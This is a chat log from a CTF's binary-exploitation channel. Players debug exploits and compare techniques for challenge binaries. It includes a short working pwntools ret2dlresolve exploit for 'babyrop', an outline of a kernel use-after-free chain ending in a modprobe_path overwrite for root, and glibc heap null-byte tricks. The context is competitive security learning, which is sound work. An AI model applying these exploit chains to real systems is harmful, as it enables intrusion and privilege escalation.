#pwn

It worked well for me.

sice sice baby giving thoughts now

😔

: o

eh

my exploit fails over remote, 😦

is there any timeout for sice sice baby

i suspect that short reads are being problem

admin for flippidy

asleep 🙄

he will be up within 2 hours

if he is not I will give him a very severe chastisement

uhh

idk why but my exploit is working on the local environment and fails on remote

could you provide the example docker file for sice sice baby ?

uh

nvm got the fllag I don't why it is not working locally

it's ubuntu 19.10 running under https://github.com/redpwn/jail

thanks

Bruh

Tfw

my other pwn isnt released yet

Feels bad

ill save it for a different ctf

nowhere in the rules does it say

we can't release challs

between +12 and +24

🙂

yeah but thats toxic

quantum_irl

all we guaranteed is none after +24

Its ok

My other pwn is solvable in like 30 mins

If u know what ur doing

If u know what ur doing
That's the catch here

lol

What happened 👀

@coral heart even a checkfor 8bits alignment :p

Of course, otherwise itd be too easy :)

Wat

lol nothing

To not leak anything

good challenge 👍

Oh

Yeah :^)

:pepega:

https://cdn.discordapp.com/emojis/647684758599499815.png?v=1

:O

👏 rpisec op

Yoooo congratz to whoever blooded hashbrown 🙂

Dm me your solution cuz I'm just curious

may i see the docker file for babyrop?

nvm

well that's for sice sice baby

why do you need the docker file?

wtmoo

stfu

my chall

same as others, not working remote, wanted to see if i miseed something

check your offsets

lol

🙂

yeah check your offsets

tnks, ill check

sice sice baby makes wanna kms

😔

🙏

dang, 0x3f flexing with sice sice as their only solve

😂

i bet it's m30w

its not

👀

W this means i can release my other pwn

(^:

its easier than sice sice, i promise

M3OW the god of pwn x)

https://tenor.com/view/tom-y-jerry-tom-and-jerry-meme-sad-cry-gif-18054267

Uh oh poortho's other pwn

😨

u havent even looked at it lool

what libc version is used on babyrop?

.

.

ok, only reason I ask is the classic "works on local but not on remote"

tfw when you try to make your exploit reliable but instead you fuck up

"tfw when"

I have the same problem, i have something that works locally for babyrop but not on remote

this is why u provide dockerfiles smh @coral heart

nah

dockerfiles useless

dockerfiles solve

this exact scenario

where it works against local but not remote

if you provide dockerfiles you also get "how to use docker"

i mean its better than

if you provide libc you get "how to use custom libc"

ur exploit not working against remote

and u don't know why

poortho is jsut a boomer smh

dockerfile too new fangled

tbh i dont wana provide support for jail base

o wait

we should be making that image public

so competitors can build off of it

it already is

o ok

https://hub.docker.com/r/redpwn/jail

o then it shouldn't be an issue?

like wat are teh chances the docker build works for us

but not for competitors

u need a million flags to docker run tho

oh

jail.redpwn.net/quickstart

dockerfiles > no dockerfules

mine also works local and not remote

the author just says to check your offset's

don't leave anything to chance :)

make sure u have complete control

flippidy is making me mald

👀

😦

flippidy is troll

bosh :pepega:

no its not

flippidy was troll

lmao i was like , wtf

😂

josh gave free gift,

i still don't know what the vuln was

yeah i dont know either i just got the flag randomly

like i tried doing a few things and it gave me shell out of the blue

kinda trolly

LOL

wtf

:thonkeng

All I rembemr is that I was playing with the flip option

then I try typing something and it says bash command not found

now do sice sice baby / hashbrown / adult csp 🙂

someone blood adult csp pls

so our effort setting up remote doesn't go to waste

fitting chromium into a 100mb zip isn't easy you know

the challs that take the most effort to setup on infra are the ones that get the least solve

sice sice baby is easy

it has a solve

by a teamn that doesnt even have sanity

sice sice baby is too hard

that means its easier than sanity

i'm just bad 😦

wtf

u guys are trolling

flippidy is not that easy

is it

????

what can i do to convince willwam to take up pwn

just do it

solve sice sice baby

flex on fizzbuzz

he cant solve it

:^)

too much effort 😦

😦

😦

just get the flag 🙂

poortho u should add ur dockerfile

nowo

wait what how did people do flippidy without knowing the vulernability what

it definitely took some degree of effort for me lmao

they might be trolling

idk

bruh what

using ld preload in pwntools makes it so i cant attach to the program with gdb

bruuuuuuuh

dont use LD_PRELOAD, use patchelf with --set-interpreter and --set-rpath instead

i have had the same issue in the past, it is miserable

^ patchelf op

if theres too many libraries and there's too many things to setup, the easiest thing to do is a dockerfile with the correct environment and gdbserver installed
generally this isnt an issue with ctf problems, but it might be if youre actually trying to develop an exploit on a real app with lots of dependencies

can you do this with pwntools?

patchelf is a separate tool

ah ok

ty

the idea is that it actually modifies the binary, so you can just run stuff in pwntools normally

i see

👀

👀

wait what is rpath supposed to be

usually your local directory

so it doesnt try to load the libc.so.6 installed in your distro

but instead loads the one in the current directory

ah ok

RPATH is basically the directory that the ELF searches for libraries in

also is pwninit fine for making the .so file

what is pwninit

oh huh that looks interesting

blevy 🙏

ive never used pwninit but that seems like something that could be interesting

alr

so i just set the interpreter to my local one or?

generally each libc version (both number and whether its ubuntu/debian) needs the correct interpreter

patchelf --set-interpreter `pwd`/ld-linux-x86-64.so.2 --set-rpath . <binary> is my goto command

i usually just spin up an ubuntu docker container of the appropriate version and copy the /lib64/ld-linux-x86-64.so.2 from it to get the right linker

oop now i cant even run the binary lmao

if u run what asphyxia posted u have to make sure the libc and the linker are both in the same directory with the binary

oh

ok

also they need to have the correct name

linker needs to be named ld-linux-x86-64.so.2

is there any way to get the correct linker in the directory without screwing up my system

or actually hm

prob can just

thats why i copy from docker container

i have personally found it really hard to find the correct linker version by searching online

yea ok im just gonna use docker cause now it segfaults on run

pulling from docker container is the most convenient way to actually get the file lmao

i usually just do sudo docker create ubuntu:20.04 sudo docker cp [container_id]:/lib64/ld-linux-x86-64.so.2 . -L

tho I use ubuntu's package search to figure out which ubuntu version

where container_id is returned by the create command

wait i just got it to work

somehow

make absolutely sure its loading the correct libraries and stuff

solved sice sice baby

i can go to sleep now

@next orbit no sleep

Do hashbrown

Or adult csp

😦

pwn/babyrop: what machine is it running on? My exploit runs fine locally but getting error on the server 😦

ctf only ends when hk solves both hashbrown and adult csp

:((

i can't

If you've already got something to leak addresses it should be pretty easy to find out

i will give adult csp a try tmmr.

time to sleep

ctf never ends

👏

wait TRUE

if the ctf never ends we have an excuse for not giving out prizes

WWW

it runs in docker, you are intentionally not given any information on what distribution/version

.

ducker

12hr sol for adult csp 👀

that's how long it took to write the reference sol

when do you release poortho's pwn ?

👀

in 30 min

i believe

yes

That's going to be heaps of fun

nah its not heap

its just uh

well

you'll see

it's great fun

can confirm

glad bags 2?

no

glad bags 3

yes

3 sgab dalg

yet another bitflip chall

👀

yea this time you only get to flip half a bit at a time

bitflips but on a ternary computer

alright its 7 pm

u know what its time for?

checks to see if challenge is up

uh

it's time for

free flags?

🙏

omg sourcelessrustwasmpwn is up pog

The name is not convincing, not even a bit.

Robin, solve my kernel

ill solve your kernel 😏

much leek many wow

I'm sorry I'm assisting the people who can't refresh the page 😒

Robinnn, take 3rd blood smh

Why I have a feeling you made it too hard?

okay fine sourceless rust wasm pwn

sourceless, rust, and wasm

should never go in a sentence together

That's better, see commas are important.

well that's why it's source rust wasm pwn

No matter how you put it, it is just comes down to the same :(

🙂

solve my pwn pls

yes solve rob's pwn please

^

solve rust wasm pwn

🙂

hmm who will get less solves 🤔

hashbrown or sice sice

hashbrown

cuz kerneL

imagine if i didnt give src

guarantee 0 solves

onlyc ause everyone would be too lazy

to do the rev

actually didn't pernicious

do it w/o soruce lol

wut?

yea pernicious didn't need src for my kernel chall

he didn't even realize there was src

kernel

we love to see it

Who is this pernicious? RPISEC and #1 on pwnable.tw but that's just it about him.

mfw sourceless rust wasm pwn is one challenge

wtf

lmaoo

It's poortho's magnum opus

Next to glad bags 3

Can someone give me some advice on babyrop? I think I may be missing something

Nobody? :/

@eternal basin

if you have questions, feel free to dm the author

.

He is not online...

he will see the messages when hes back online

Okok thx

answered

Wow that got blooded fast

Did i get cheesed

🧀

Shouldve removed src :megajoy:

yudai too good

i have to stop playing the ctf cz i have an important task to do 😭
thank you for the amazing challenges 👍

Maybe next year

Instead of rust wasm

I will have a rust wasm node chromium challenge

hmm is Haskell wasm a thing

Yes

hoy

Woah ptryudai 👀

Just solved hashbrown :D awesome challenge!

sadge

chromium is L

rob W

Good job 🙂

Wanna dm me your solution ?

Yep 👍

@eternal basin you around?

yes

is aslr enabled on babyrop?

yes :)

also to whoever is bashing babyrop at 6 conns/s, you're better off finding a reliable solution

you won't find many pwnables with aslr off, it's 2021 after all

however PIE is disabled on that binary

tfw when you hear cyberpunk used to run without aslr

SiceSice is hard af need to see a write-up after the end of this CTF x)

Very interesting challenge

sice sice baby !

xD @next orbit did u solved it?

yep

similar to the challenge you put already in asis

but this one

someone's gonna need to volunteer a writeup bc I'm pretty sure poortho's too lazy to make one

xD

more restrictions xD

XD

i'm not , maybe other teams who did may do writeup

🤪

idk how to explain this in a writeup 😂

glibc heap in a nutshell

something changed with babyrop? I've been working on it, did not change anything on my end but it stopped doing what it was doing 🙂

might have been banned for abuse

I was not the one bruteforcing it 🙂 I have like 2 requests per minute 😄

hmm dm me

wut ?

~~people bruteforcing that chall ~~

.

mostly new to pwn, completely new to rop

why in the name of the nine hells did you use write instead of puts

🤪

pulling my hair out trying to find a gadget

there are more questions about babyrop than any other challs(pwn)

heh

I keep trying to find relatively easier ctfs to take my team to

I went to justctf then this

@analog perch exactly

sourceless rust wasm pwn, so many dead ends

😔

it's red herring :((

Wasm loves u

Odang it has 3 solves now

Nice

@coral heart I hope for a write-up for Sice Sice BAABY!

TRUE

👀

Great challenges deserve great write-ups

writeups are effort zzzzzzzzzzzz

lol lazy

yes

Just the exploit will do 👍

o

ok

👀

where is the noob stuff??

have you tried adult csp

hackthebox

no i haven't but after looking at it. it would be fine but it seems like i have to make a program just to read the read me file??

you can open the readme file in a text editor

file extnsions are a social construct

well no

it's definitely md

yea that didnt work so

try babyrop, that is the easiest pwn

try josh's dms

that is the easiest pwn

none of it is for a noob

LMAO

Just solved babyrop. Is it seriously supposed to be a simple rop? It is the hardest I ever did

the funniest thing is
my exploit works in remote but not in local

🥲

good enough!

:c

:c

sometimes when you say 'ayo wtf this shet should work sheeeeiiiiit'

just try it in remote

maybe you're right

prolly bc bash doesn't like the libc

: Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion sym != NULL' failed! Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion sym != NULL' failed!

it tells me this

glibc pwn smh

yea looks like your libc and ld don't match

the program works tho

bruh

sourceless wasm timeout :c

uh

my exploit works locally

for sourceless wasm pwn

doesn't work on remote

never mind

solved

my bad

poortho gets outplayed by hk yet again

:((

lol

op 🙏

orz

pls do the last pwn :(

😦

3/7 web tho 🤔

we are only 3-4 / 5 people playing rn

hm 5/6 pwn kinda flex tho

no flex

🙏hk🙏

btw i didn't solve hashbrown

@severe sky did

3-4 / 5

@coral heart will make heap task next year where, only alpha numeric characters allowed

:pepega:

@native swift doesnt think sudo is reason

you crashed

but locally I am not

on remote you did

and how do I know why?

👀

it's always nice to provide libc with chall

probably offsets

ye

ok lemme try

check ur offsets or look into common pitfalls with ropchains

stack aligning is fine, just need to find your version of glibc

2.2.5, but which build

uh

u can determine that using the remote

oh ye + 4 instructions nice

do you have to read a file for baby rop?

the flag is in flag.txt as per usual with pwn challenges 🙂

okay great

@eternal basin i've tried write leak, no success

😦

try harder?

there is no pop rdx; ret gadget, so i cant call write correctly

try harder 🙂

welp, exploit works on local

still stumped

learned an awful lot about rop, tho

im in the same boat

same

found a thing that works on local but not remote

nah, i will wait for write up, no way to find libc for me

GOOGLE COMMON ROPCHAIN PITFALLS ON REMOTE

💔

pb'd

gg

W

gg

Adult CSP solved pog 😄

lmao

👀

my shortest exploit for babyrop released 30 minutes before end of ctf

smh pwntools rop

anyone want to play "lets play code golf... with python exploit"

thonk

ok brb patching pwntools to rename things to one letter

inb4 exp.py is just __import__("e") and you have an e module in site packages

lmao

wait import e way shorter

I'm pepega

if it were that, it would've been just 1 line

with a few tens of characters

inb4 rewriting python bin and solve script is 0 bytes

be hk

write in c++

"solve script? here's the binary"

"do you want it static linked or no"

do you want -O3 stripped or no

i prefer statically stripped

with multiple passes to movfuscator

here to prove it, i'll release exp after ctf end

why not release it right now

🤔

who's got hk's c++ pwntools

release it rn as rev

i dunno if the mods would let me

I'd let you

u should golf ur

adult csp sol

tkoa

ok rob

aplet pls

i didn't do adult csp

just ask them for the sol to golf

hey look just because I'd let someone post sol early doesn't mean gink can't come in and ban them

not my issue

next time i should add a size limit

on the js payload

Browser pwn on redpwnctf? 👀

ok now it's also waf bypass

bowser pwn

there is one planned

i have one more

decent idea

wtmoo leek

rob feel free to discuss all your rpctf ideas here

🙂

mario pwn

uh

windows browser fullchain

w/ 1days

ynaut 0days

cve pwn time?

o wait i have a fun

not-marked-as-1-day 1day

iOS browser fullchain

tfw rob dropping 0days in ctf

:leek:

dw we already shelled ggl

:thonk:

ok how long to make the

adult csp writeup

due 7 pm est

today

Just attach script with no comments

I'm so happy, I am officially a baby. I managed to get babyrop to work .. after .. a .. day 😂

good job! 🎉

holy fuck i got it

fuck sice sice pwn, lol, please share hints now

that took so long

ahhhhhhhhhhhhhhhhhhhhhhhhhhhh

hint: you need to get the flag

doesnt get better than that

hint: you will get another hint in 7mins

hint: just be poortho and it gives you the flag

i think i understand sice sice but god damn if it isnt a pain to think about and implement

if youre wondering why u cant solve the chall, its bc ur not poortho

tfw ur poortho

if you get the flag and submit it, you will get the points for the chall

can i ask someone about an LD_PRELOAD issue? I thought I had it fixed but apparently not. I also tried patchelf but that crashes too

sure whats the problem @whole epoch

btw if you use LD_PRELOAD with a libc that didn't come from your system, there's a good chance /bin/sh will crash

that's why I use a static linked /bin/sh 🙂

yeah that
if you're debugging in gdb and you see "process forked" you're probably fine

https://ginkoid.is-inside.me/xwO1Cb9S.png

but alas, the commands themselves are not static linked

https://ginkoid.is-inside.me/Dd8UR5sr.png

from pwn import *
context.binary = e = ELF('./babyrop')
r = ROP(e)
d = Ret2dlresolvePayload(e, symbol="system", args=["sh"])
r.raw(0x40116B)
r.gets(d.data_addr)
r.ret2dlresolve(d)
p = remote('dicec.tf', 31924)
p.sendline(fit({0x48: r.chain()}) + b'\n' + d.payload)
p.interactive()

babyrop

pepega

o pwntools has ret2dl for 64 bit?

👀

almost copied it verbatim from here: https://docs.pwntools.com/en/dev/rop/ret2dlresolve.html

had to fix one small thing tho

remove spaces 🙂

Ok can we know the solution to Sice Sice BAAAABYYY! xDD

No heap leak poison null byte 🙄

Yep I know

But how?

Good question

No partial overwrites

and small chunks

it's doable when allocating relatively larger chunks

by bruteforcing 4bits

I never did it

solution for hashbrown?

im guessing that for sice sice you had to make a fake chunk and get some pointers that pointed to it using the null byte overflow?

Was the way to leak libc for flippidy to double free to get a pointer to IO_Struct?

@brave lagoon Yep you need to bypass the unlink check

Just by heap feng shui

and the null byte at the end

i realized that was probably what you had to do but it seemed like a massive pain in the ass

yep it is to be honest xD

you can point it to whatever

doesn't really matter

Where did you get to?

@stuck magnet i just leaked one of the symbols in the GOT

Yes but how did u get it to print it

by replacing one of the pointers in the prompt string array

Ah

That makes much more sense

i thought that was a pretty fun idea from the challenge

Yea, was fun I just missed that function and thought I had to overwrite IO stuff to get it to print a leak

you could probably do that

actually nvm that seems hard

its probably something you could do but it would take a hell of a lot of effort

Learned a lot of new stuff tho so rly cool

Even if it prob was impossible to do that way

I wasn't able to make the race condition with delete value and resize reliable, so not too far, now I'll try to understand your exploit

Oh to make the race reliable, you can actually hang the resize thread with userfaulfd method

you could probably use some kind of fsop for flippidy

but I didn't really look into this much

i was able to get a single arbitrary write on flippidy (and used it to leak libc) but what was the trick to being able to do it again without hitting one of the many malloc/free asserts

😢 I didn;t know about that, I tried to synchronize the thread right before add_key and delete_value and then try to execute them in random order but it only worked once in a while

i was dumb and thought that the flippidy double free could only be done with size 1 array and spent hours upon hours trying to figure out how to avoid the fasttop corruption error

wat

you can do it with size 1

Well now you know forever 😄

Yeah just lost 2 days xD

And do CONFIG_FG_KASLR add complexity?

@native swift can you give script
the only way i could find to do it was chaining together tcache poisoning to get leak and then free_hook overwrite to system
which i had to use size 3 array for

Leaks are useless?

Tbf I'm pretty sure unprivileged userfaultfd isn't allowed anymore starting in 5.11 (which was the only version which I could build fg kaslr successfully) so I had to patch the default value to not spoil the challenge in the init file (since seeing uffd = big race hint)

o I misread

yea I used size 3 too

Yea fg kaslr compiles most c functions in its own section and then scrambles on boot

So like per function aslr in a sense

Cant just leak one function address and get all other offsets

Yep but you can know the addresses of the functions in the same header right?

Hmm I don't think so? I didn't actually check lmao

The trick is data and early parts of text aren't affected by fg kaslr

is there a sice sice writeup yet

Any writeup for sourceless wasm blah blah?

Oh ok because I know that the compiler put the functions that share the same code flow into the same header and hence if you get one leak you know the other functions

Thanks that was a good challenge @strange pecan 👍

no glad you enjoyed it 😄

I might have a writeup later tonight

int overflow -> type confusion -> buffer overflow on stack -> overwrite bss (cuz wasm is weird, not only is bss after the stack but is also writeable even though the string should be read only) to change excalibur to flag

Ahhh

sice sice baby plz

(hashbrown) So after triggering UAF, can we get the address of text/data/etc?

give sice sice writeup please thanks

All I could get was slab addresses

https://tenor.com/view/spongebob-who-asked-gif-18211844

sice sice writeups?

Yes you have to get a useful kernel structure allocated that contains leaks

I used shm_file_data

@strange pecan And do SLUB is exploitable the same way as SLAB in your challenge?

I would assume so? You might have to be careful with the freelist metadata in slub

Hm was babyrop ret2csu intended?

yes

Ah nice

looking at channel for sice sice every 5 minutes be like

yay

i posted a solve script

:pepega:

omg nice comments poortho

I noticed the copy_to_user leak fails gracefully on invalid addresses and then located kernel data by starting at 0xffffffffc0000000 and going backwards in steps of 0x100000, until I found a hardcoded string in the first kernel data page

Crude but works 😂

I solved it using this method as well

Nice. What did you do after that? I searched for the modprobe path in the kernel data and overwrote it

Clever 😄

yeah, I also overwrote it and used binfmt to trigger the modprobe

Me too

I wonder if it's possible to overwrite a forked cred structure cause it's 0xa8 in size 🤔

And done a real bypass

modprobe_path seems like the easiest way to get root using arb rw

@strange pecan I don't think you can do it in this version of the kernel

Tried it but something didn't work out lol

Yea what I suspected

I think cred structs have their own kmalloc cache

@strange pecan It got it own cache starting at v 4.15

Phsymap spray too hard 😢

That's the hardest part x)

@severe sky You got arbitrary read to search for the modprobe_path right?

Yes

Summary:

• allocate a bunch of entries
• start a resize and block it in copy_from_user after it copied the hashmap
• free all the values
• continue resize
• all values in the hashmap are dangling now
• reclaim values with entries
• locate a value which got reclaimed
• build arbitrary read/write out of that
• find kernel data by starting at 0xffffffffc0000000 and going backwards in steps of 0x100000, until finding hardcoded string in first kernel data page
• search kernel data forwards until finding "/sbin/modprobe"
• overwrite modprobe with path to exploit
• trigger modprobe

Levitatinglion should make writeup too 😃

Agreed x)

@severe sky If modprobe wasn't an option do you think SMEP/AP can be bypassed with RIP control?

My approach would be to locate the init task struct in the kernel data, walk the process list until I find my process and set its uids to 0

learned so much from this ctf, pretty new to pwning , thank you for all decent pwnss 🤟 💯

That's the way to go 👍

looks at my exploit and sees a ret2dlresolve

xd

xd

kalm: doesn't even have to do any ass work cause all the hard sweaty work has already been done for me
panic: finds that exploit doesn't work on remote
kalm: realizes stack is not 16-byte aligned

https://github.com/Gallopsled/pwntools/blob/b76d045a40/pwnlib/rop/ret2dlresolve.py#L323-L328

👀

#writeups message

@woeful cradle is ret2dlresolve do the same thing as jumping into a system@plt?

yeah

I saw your 4 lines poc xD

*10 lines

but sure

Okey x)

basically you screw with the internal elf structures so that the resolver will call whatever function you ask it

well technically it uses dlresolve to jump into system directly, it doesn't use the plt

you just use the plt? (or is it got I forget) entry for dlresolve

well see all plt function jump to some common function

that then jumps to the dl-resolver

You can even call a function without having it's plt address?

the dl-resolver address is located in got

Never used it :p

I didn't know about it x)

I though it was a jump to function@plt and I was doing it manually

@vagrant cypress ok i added the writeup link with my exploit link in the same post in writeups if you were curious 🙂

I will surely read it, thanks a lot for your efforts!

Damn, the sice sice baby....

Make a writeup poortho.

i sent a solve script

(^:

When the writeup for Adult CSP would be out?

@proper bone :^)

@proper bone

lol

oops

the more pings the better

for legal reasons that was a joke

soon™️

today mby

Writeup for "Adult CSP": https://blog.robertchen.cc/2021/02/07/adult-csp/

ok rob I see you

posting same message twice

🔨

just making sure it gets to the ppl who want it

is there any way to get libc debug stuff to work using the provided (non-debug) libc for flippidy

eu-unstrip

Remerges debug symbols

wow thats awesome! never even knew that existed. thanks!

But I believe gef doesn't need them (only pwndbg)

which do you prefer?

gef

or pwndbg?

Gg

Any annoying heap massage, I use pwndbg, otherwise gef

jeff

wait what benefits does pwndbg have over gef

vis

https://gitlab.com/hkraw/ctf_/-/tree/master/dicectf-2021

exploits for, babyrop - sice_sice_baby, sourceless-wasm-rust-pwn, flippidy

what is this #define abuse smh

galaxy brain moment

oh adult csp got solve

btw post these in #writeups 😎

wtmoo define caboose

lmao

about chall sice-sice-baby, it seems like i pulled out the solution a bit more harder way, then intended

you could have 0x100 size of chunk, when you have 0x100 unsortedbin, you allocate 0xe8 and you get chunk allocated with the 0x10 byte overhead

but my solution doesn't depends on that

I noticed that and I filled 0x100 tcache

But I didn't know how to go further

with my technique it's possible to exploit it even with 0xc8 max size allocation

That's even better

i recalled, the old null byte technique

which worked on glibc 2.23

and then got patched later

it turns out that we can still make just a slight changes and it would still work

hk op 🙏

no :((

:((

What is the methodology of solving these kind of challenges?

wow c++ pwntools

for the backward consolidation , crafting fake looking double linked list with heap feng shui

Yep for the backward consolidation the challenge was all about satisfying the check

no, it wasn't really

you can try my asis chall

that one is much more easier than this

I already solved that one

Not because I know how

this is spaghetti, tcache spaghetti

because its already a house

targeting the same issue

no ?

it's not

https://github.com/shellphish/how2heap/blob/master/glibc_2.31/poison_null_byte.c

require 4bits bruteforce

in this challenge, we can only alloc small sizes

which means this house will not work

👍

btw as far as i remember, rust handles integer overflow by default.
am i wrong or was the binary for rustwasmpwn compiled with some special options?

yeah, idk why it worked

i thought rust "handles" it by defining it to overflow back to 0

no?

I didnt do any special options

Oh wait

It handles it in debug

But not release

I think

🤔

Yeah i had to compile release so it wouldnt get caught

Lol

yea rust in debug will panic

makes sense

o

there's a special function you need to call for overflowing math iirc

The current status in Rust was decided in RFC 560:

in debug mode, arithmetic (+, -, etc.) on signed and unsigned primitive integers is checked for overflow, panicking if it occurs, and,

in release mode, overflow is not checked and is specified to wrap as two’s complement.

didn't know that

it makes sense

ye u have to do a checked_add to have it crash in release

btw @proper bone with AdultCSP, do you know exactly what object gets allocated on top of the freed CAT objects in order to result in a heap + chrome leak?

is it just some noisy allocations happening in the background within chrome?

you don't need to know exactly what object

i just triggered network activity w/ fetch

which was noisy enough to get good leaks

ah alright cool makes sense

~~do you want executable packed with custom packer? ~~

https://ctftime.org/writeup/24881

in which I had to find some text large enough to actually make my compression decrease the final size

Where is this c++ pwntools library

I'm still waiting on rust and go pwntools tho

why tho

haskell pwntools when

Java pwntools when

just ask rob

So it can run on however many billion devices

not released yet

Dang

still in testing phase

and adding stuff /-etc

Looks like I really over complicated my babyrop solution because I didn't know about ret2csu and ret2dl. I controlled the rbx register by running main (which writes 0xd to rbx before the write), and write doesn't overwrite rbx, but gets does (zeros it). So I overwritten gets GOT with a ret gadget, that way rbx wasn't overwirtten, and then jumped back to the gets@plt part where it calls the linker to restore the gets GOT so I could continue to the next stage

honestly thats a cooler solution than either of the ret2[stuff] imo, even tho those are good techniques to know

lol thanks

forbidden ctf tactics by pwn chall authors: Write pwn challs in bizarre languages so it gets less solves```

forbidden ctf tactics by authors part - 2: Write pwn challs in bizarre arch so no on try to solve the chall

@strange pecan the linux exploitation challenge was awesome ( Even though I couldn't solve it :(... ) Thank you!

bruh

babyrop was more interesting than I thought

I did not know about ret2dl and ret2csu

I'll have to figure them out

What was the intended way to bypass fg_kaslr and everything else in hashbrown? Not sure that our way of doing it wasthe intended one

ret2csu is basically just normal rop but using gadgets in csu

except a little bit more thinking about what get executed

I mean you can just call got

so not really

Also, when we need to control rdx, for that we have to manage one funtion call, which is generally made to call _fini by people, why don't we just point it to call some ret instruction?

it calls [r15+rbx*8]

if r15+rbx*8 is the address of a ret, then it will call the assembly

people use _init (and _fini i guess) because there are pointers to it in the binary

ooooor you can just call got

you can also do that

you can also chain them together since the second gadget continues into the first

ohhh yeah, I totally missed it
Yeah. finding a pointer to ret instruction is quite difficult

almost impossible

maybe i'll do writeup for sice-sice-baby,

the new technique i used to do null byte attack is kind of intresting

@neon cosmos regarding your writeup for sice-sice-baby

# A is going to be the fake chunk to consolidate backwards to when we trigger the House of Einherjar
# it has to be positioned on an address ending on 0x00 to be able to massage the other pointers correctly,
# hence the 0xe8 allocation on #4 to adjust the heap to allign this
# AP is simply another small sized chunk used to consolidate A backwards and keep its pointers in the heap

Here chunk A can be positioned at any address ig, since we can partially overwrite the address(former chunk_size) with 4 bytes, so it wouldn't change the fd_pointer, right?
Correct me if I'm wrong

Hmm I don’t think I fully understand what you mean

Part of the needed massage to pass the victim->fd->bk == victim check (and the other way around) requires using the poison null byte to change the pointers of the 2 chunks referenced in the fake chunk that is being consolidated

And because the poison null byte is the only way we can do a partial overwrite without corrupting the rest of the pointers the fake chunk has to be at a 0x00 ending address

That’s how I see it anyway, I might be missing something

According to you, here we need the address to be ending with null byte because, when we overwrite size, then one byte of fd will become 0 and hence this check victim->fd->bk == victim will fail

But, we can change size and not change fd pointers LSB, both simultaneously by overwriting only 4 bytes of size(and it will be all good as rest bytes are already 0)

See, we can partially overwrite with 4 bytes

    uVar2 = read(0,*(void **)(&ptrs + (uVar1 & 0xffffffff) * 8),
                 (ulong)*(uint *)(&size + (uVar1 & 0xffffffff) * 4));
    if ((uVar2 & 3) != 0) {
      puts("No partial overwrites :)");
                    /* WARNING: Subroutine does not return */
      _exit(0);
    }

you don't need to partial overwrite

just 1 byte partial overwrite is enough ( which is always NULL )

because it writes 1 byte off

@next orbit You are talking about overwriting of chunk_size for backward_consolidation, right?

no

i mean yes

but also by partialoverwrite, i mean just one byte of the fake chunk headers

Hmm yeah

@next orbit how was possible to backward consolidate without having a chunk with at least 0x100 as its size?

in your poc i mean

i overflow into freed unsortedbin chunk size

since that chunk was unsortedbin , it's next chunk had a prev size and inuse bit cleared,

yep I agree

it won't get updated because we trimmed from 0xXXX -> 0xX00

we allocate the remaining unsorted chunk back

and we have a chunk whose prev_inuse bit is cleared and also has a fake size

^_^

Okeey I'm not skilled enough to get your point but it seems promising x)

Think of a write-up to your poc

i'll make a writeup

That's great then

maybe will make pull request to how2heap,

do they have null byte overflow on new libc without leaks ?

Yep

But 4 bits bruteforce

When you have done that, the size of the unsorted bin chunk has been reduced, how can you go up to the next chunk prev_size?

you don't need to

ig we can change that before freeing the chunk present in unsorted bin?

Yep @cobalt yoke I guess you're right

overwrite but just with 4 bytes

to not tamper with the size

oh you mean, to not crash ?

you just fake next chunk

inside that bin

Yep @next orbit I meant how can you modify the prev_size of the next chunk

whoamiT nailed it

👍

idk if how2heap has it but if you have access to > 0x100 allocations it's ez massage without leaks

Clever idea by hk as always x)

and no heap bruteforce

ofc if you don't have a way to get a libc leak it's always gonna be at least a 1/16 bruteforce

@neon cosmos They have it here is the link : https://github.com/shellphish/how2heap/blob/master/glibc_2.31/poison_null_byte.c

Bruteforce of 4 bits

oh

didn't know they had that

Because the victim chunk two least significant bytes should be NULLs

I tried something similar for sice sice baby but it wasn't possible because of the context

you can't do this in sice sice

only the second to last, and that's where the bruteforce is

the last one isn't aslr dependant and if you're using the poison null byte for the second to last you should be able to overwrite the last byte with any value

oh? I thought you couldn't because no partial overwrites

Oh sorry I meant you can't

No partial overwrite

oh ok haha

The implementation is easier btw

and it's not possible in sice sice

yea if you're bruting the 4th heap nibble the massage is a little easier

because we can't allocate large bin chunks

the bruteforce rely on that

but it's possible do massage without bruteforce nor largebins

You can consolidate a large bin chunk

but it will not work I guess

I did that for asis yet another house

for yet another house

I applied the bruteforce of 4 bits

from how2heap

and it worked

i should've also added "No partial overwrites :)"

Ye probably

i dont quite understand why the how2heap poison null byte requires a large bin chunk

can someone explain why you can't do what they're doing with a smallbin chunk?

i know it has the fd_nextsize and bk_nextsize pointers but how do those help when compared to just the usual fd and bk pointers

I haven't looked at that poc but it seems like that poc requires partial overwrite , which is not the case here

@brave lagoon you can do a leakless poison null byte without brute forcing and without largebins

oh i know the intended way

im just asking about the how2heap thing

I honestly don’t know why the initial ideas involved largebins

but ig that’s just what the first pocs used

ye thats why i was curious about it since the technique used for sice sice seems easier

Hi, can someone explain to me why in babyrop when I tried to use a ret2libc I got a segfault cause of the stack alignment or something? Thks

@gaunt cypress

https://ropemporium.com/guide.html#Common pitfalls

Thanks

not sure if this is the place to ask, but I kinda want t a gentler intro to pwn things than babyrop seemed to be, would anyone be able to vouch for ROPemporium?

ropemporium is pretty good

you can also try high school CTFs

like hsctf, picoctf, and angstromctf

leaving out redpwn smh

nightmare is pretty good too

so many

thanks!!

visit angstromctf.com for the best competition!

but I'm not a high schooler T_T

"I'm not a high schooler. Can I still compete?

Yup! You'll simply need to mark yourself as ineligible for prizes when signing up. Ineligible players will still be able to view challenges, submit flags, and see how they rank compared to other teams."

hm okay

bruh

pwntools has the ret2dl utilities

i used them just now to solve the challenge babyrop

but i have no idea what they do

I am trying to understand but it is very complex compared to ret2csu

I guess I'll try 'exploding' the exploit to see better what happens under the hood

does anyone want to try gunnhacks pwn